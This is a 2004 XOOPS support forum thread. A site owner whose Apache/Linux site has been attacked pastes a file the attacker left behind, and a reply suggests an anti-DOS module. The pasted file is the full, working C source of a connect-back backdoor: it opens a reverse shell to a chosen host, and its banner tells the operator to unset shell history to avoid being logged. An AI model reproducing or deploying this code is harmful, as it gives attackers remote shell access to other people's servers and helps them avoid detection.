1
winds
DOS - space quota - Attack! Need help!
  • 2004/2/1 23:23

  • winds

  • Just popping in

  • Posts: 10

  • Since: 2004/1/14


My XOOPS web site is down, because of classic DOS -space quota- attack

Web site is on Appache, Linux server...

I found this temp file on the server left by attacker, may be it could give you more info:

" #include
#include
#include
#include
#include
int main(int argc, char **argv) {
char *host;
int port = 80;
int f;
int l;
int sock;
struct in_addr ia;
struct sockaddr_in sin, from;
struct hostent *he;
char msg[ ] = "Bem Vindo Creative_MX Let's Hack\n\n"
"Issue \"export TERM=xterm; exec bash -i\"\n"
"For More Reliable Shell.\n"
"Issue \"unset HISTFILE; unset SAVEHIST\"\n"
"For Not Getting Logged.\n(;\n\n";
printf("Ir4dex Connect Back Backdoor\n\n");
if (argc < 2 || argc > 3) {
printf("Usage: %s [Host] \n", argv[0]);
return 1;
}
printf("[*] Dumping Arguments\n");
l = strlen(argv[1]);
if (l <= 0) {
printf("[-] Invalid Host Name\n");
return 1;
}
if (!(host = (char *) malloc(l))) {
printf("[-] Unable to Allocate Memory\n");
return 1;
}
strncpy(host, argv[1], l);
if (argc == 3) {
port = atoi(argv[2]);
if (port <= 0 || port > 65535) {
printf("[-] Invalid Port Number\n");
return 1;
}
}
printf("[*] Resolvendo Nome Do Host\n");
he = gethostbyname(host);
if (he) {
memcpy(&ia.s_addr, he->h_addr, 4);
} else if ((ia.s_addr = inet_addr(host)) == INADDR_ANY) {
printf("[-] Unable to Resolve: %s\n", host);
return 1;
}
sin.sin_family = PF_INET;
sin.sin_addr.s_addr = ia.s_addr;
sin.sin_port = htons(port);
printf("[*] Conectando...\n");
if ((sock = socket(AF_INET, SOCK_STREAM, 0)) == -1) {
printf("[-] Socket Error\n");
return 1;
}
if (connect(sock, (struct sockaddr *)&sin, sizeof(sin)) != 0) {
printf("[-] Unable to Connect\n");
return 1;
}
printf("[*] Spawning Shell\n");
f = fork( );
if (f < 0) {
printf("[-] Unable to Fork\n");
return 1;
} else if (!f) {
write(sock, msg, sizeof(msg));
dup2(sock, 0);
dup2(sock, 1);
dup2(sock, 2);
execl("/bin/sh", "shell", NULL);
close(sock);
return 0;
}
printf("[*] Conectado\n\n");
return 0;
} "


Does anybody know a quick fix for this? Please!

2
sunsnapper
Re: DOS - space quota - Attack! Need help!

There is an anti-DOS attack module.

I don't know if it will help in your case, but it may be worth a shot.
https://xoops.org/modules/mydownloads/singlefile.php?cid=24&lid=483

3
winds
Re: DOS - space quota - Attack! Need help!
  • 2004/2/2 4:21

  • winds

  • Just popping in

  • Posts: 10

  • Since: 2004/1/14


Thanks Suns

I will install this module for the future protection. I should do it before. Because it's third time that somebody did a damage to my site. I really don't know why. It seems that this time the attack is more serious than before...I fixed one thing, but found the other...

Thanks again.

4
winds
Re: DOS - space quota - Attack! Need help!
  • 2004/2/2 10:58

  • winds

  • Just popping in

  • Posts: 10

  • Since: 2004/1/14


The site is ok now, or for now.

Login

Who's Online

302 user(s) are online (107 user(s) are browsing Support Forums)


Members: 0


Guests: 302


more...

Donat-O-Meter

Stats
Goal: $100.00
Due Date: Nov 30
Gross Amount: $0.00
Net Balance: $0.00
Left to go: $100.00
Make donations with PayPal!

Latest GitHub Commits